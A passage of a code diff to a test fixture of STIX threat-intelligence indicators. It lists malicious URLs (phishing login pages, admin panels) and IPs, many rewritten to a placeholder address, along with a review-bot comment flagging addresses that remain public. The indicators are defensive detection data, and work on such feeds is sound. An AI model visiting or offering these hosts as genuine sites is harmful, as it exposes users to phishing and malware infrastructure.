'http://trotdeiman.ga/login']","type":"indicator","valid_from":"2020-01-24T02:59:54.784Z"} -{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 217.8.117.8","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.8']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} -{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: 
CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 104.223.170.113","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.223.170.113']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} +{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} +{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} {"created":"2020-01-24T03:00:01.762Z","description":"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:01.762Z","name":"mal_url: 
http://tavim.org/includes/firmino/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/firmino/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:01.762Z"} {"created":"2020-01-24T03:00:10.928Z","description":"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T03:00:10.928Z","name":"mal_url: http://onlinesecuritycenter.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://onlinesecuritycenter.xyz/login']","type":"indicator","valid_from":"2020-01-24T03:00:10.928Z"} {"created":"2020-01-24T03:00:20.166Z","description":"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T03:00:20.166Z","name":"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T03:00:20.166Z"} 
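Review bot: The rewritten record for TS ID 55250078008 still carries a publicly routable address: `199.192.28.11` became `199.192.168.11`, but 199.192.0.0 is not inside any RFC 1918 block (10/8, 172.16/12, 192.168/16), so only the third octet changed and the fixture keeps a real public IP, which is what this bugfix is meant to remove. It should use the same value as the other rewrites in this hunk, `http://89.160.20.156/panel/admin.php` in both `name` and `pattern`, or a host that is genuinely private such as `192.168.28.11`. The unchanged context record for TS ID 55250078010 (`http://67.215.224.101/a1/panel/admin.php`) likewise leaves a public address in the test data, so the sweep appears incomplete for URL-embedded IPs. Also worth noting that every `mal_ip` indicator in this hunk now resolves to the identical value 89.160.20.156 under distinct `id`s, so any pipeline behaviour that depends on distinct indicator values is no longer exercised by this fixture.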
@@ -78,64 +78,64 @@ {"created":"2020-01-24T03:00:55.816Z","description":"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:55.816Z","name":"mal_url: http://tavim.org/includes/salah/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/salah/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:55.816Z"} {"created":"2020-01-24T03:01:10.501Z","description":"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-24T03:01:10.501Z","name":"mal_url: http://l0c23205.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l0c23205.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.501Z"} {"created":"2020-01-24T03:01:10.518Z","description":"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:01:10.518Z","name":"mal_url: http://l535e9e5.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.518Z"} -{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 217.8.117.47","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.47']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} -{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://46.161.27.57/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} -{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://104.168.99.170/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.170/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} +{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} +{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://89.160.20.156/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} +{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} {"created":"2020-01-25T02:57:38.187Z","description":"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--da030e10-af9f-462d-bda8-33abb223e950","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:38.187Z","name":"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://officelog.org/inc/js/jstree/scan/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:38.187Z"} {"created":"2020-01-25T02:57:38.214Z","description":"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--d38e051a-bc5b-4723-884a-65e017d98299","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-25T02:57:38.214Z","name":"mal_url: http://f0391587.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391587.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:38.214Z"} -{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://46.161.27.57:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} +{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://89.160.20.156:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} 
{"created":"2020-01-25T02:57:51.296Z","description":"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b9715fd5-b89a-4859-b19f-55e052709227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-25T02:57:51.296Z","name":"mal_url: http://f0393086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393086.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:51.296Z"} {"created":"2020-01-25T02:57:56.007Z","description":"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--e3177515-f481-46c8-bad8-582ba0858ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:57:56.007Z","name":"mal_url: http://insuncos.com/files1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files1/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:56.007Z"} {"created":"2020-01-25T02:57:56.044Z","description":"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:56.044Z","name":"mal_url: http://tg-h.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tg-h.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:56.044Z"} {"created":"2020-01-25T02:58:11.038Z","description":"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: 
CyberCrime","id":"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-25T02:58:11.038Z","name":"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:58:11.038Z"} -{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://185.234.217.36/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.217.36/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} +{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://89.160.20.156/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} {"created":"2020-01-25T02:58:20.448Z","description":"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: 
CyberCrime","id":"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-25T02:58:20.448Z","name":"mal_url: http://topik07.mcdir.ru/papka/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:20.448Z"} {"created":"2020-01-25T02:58:33.189Z","description":"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:58:33.189Z","name":"mal_url: http://insuncos.com/files2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files2/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:33.189Z"} -{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://185.234.218.68/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.218.68/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} +{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: 
CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://89.160.20.156/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} {"created":"2020-01-25T02:58:59.472Z","description":"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--f502199a-17a4-404b-a114-fb5eda28c32c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:58:59.472Z","name":"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:59.472Z"} {"created":"2020-01-25T02:59:27.07Z","description":"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--af7422eb-5d8e-4878-bdd1-395313434dae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:27.07Z","name":"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:27.07Z"} {"created":"2020-01-25T02:59:28.967Z","description":"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: 
CyberCrime","id":"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:28.967Z","name":"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:28.967Z"} {"created":"2020-01-25T02:59:37.661Z","description":"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-25T02:59:37.661Z","name":"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:59:37.661Z"} -{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.64.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} +{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: 
CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.168.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} {"created":"2020-01-25T02:59:54.296Z","description":"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:59:54.296Z","name":"mal_url: http://insuncos.com/files3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files3/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:54.296Z"} {"created":"2020-01-25T02:59:57.748Z","description":"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-25T02:59:57.748Z","name":"mal_url: http://t95212tt.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t95212tt.beget.tech/login']","type":"indicator","valid_from":"2020-01-25T02:59:57.748Z"} {"created":"2020-01-25T03:00:22.168Z","description":"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T03:00:22.168Z","name":"mal_url: 
http://kiototan.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kiototan.site/login']","type":"indicator","valid_from":"2020-01-25T03:00:22.168Z"} -{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 176.107.160.43","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.43']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} +{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} {"created":"2020-01-25T03:00:29.248Z","description":"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-25T03:00:29.248Z","name":"mal_url: http://newfoundfriend.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://newfoundfriend.xyz/login']","type":"indicator","valid_from":"2020-01-25T03:00:29.248Z"} {"created":"2020-01-25T03:01:03.628Z","description":"TS ID: 55253484360; iType: mal_url; 
State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.628Z","name":"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.628Z"} {"created":"2020-01-25T03:01:03.65Z","description":"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.65Z","name":"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.65Z"} -{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://45.139.236.48/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.139.236.48/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} +{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: 
CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} {"created":"2020-01-26T02:54:41.675Z","description":"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-26T02:54:41.675Z","name":"mal_url: http://privatepp.club/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://privatepp.club/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.675Z"} {"created":"2020-01-26T02:54:41.705Z","description":"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-26T02:54:41.705Z","name":"mal_url: http://109.94.208.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://109.94.208.144/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.705Z"} -{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: 
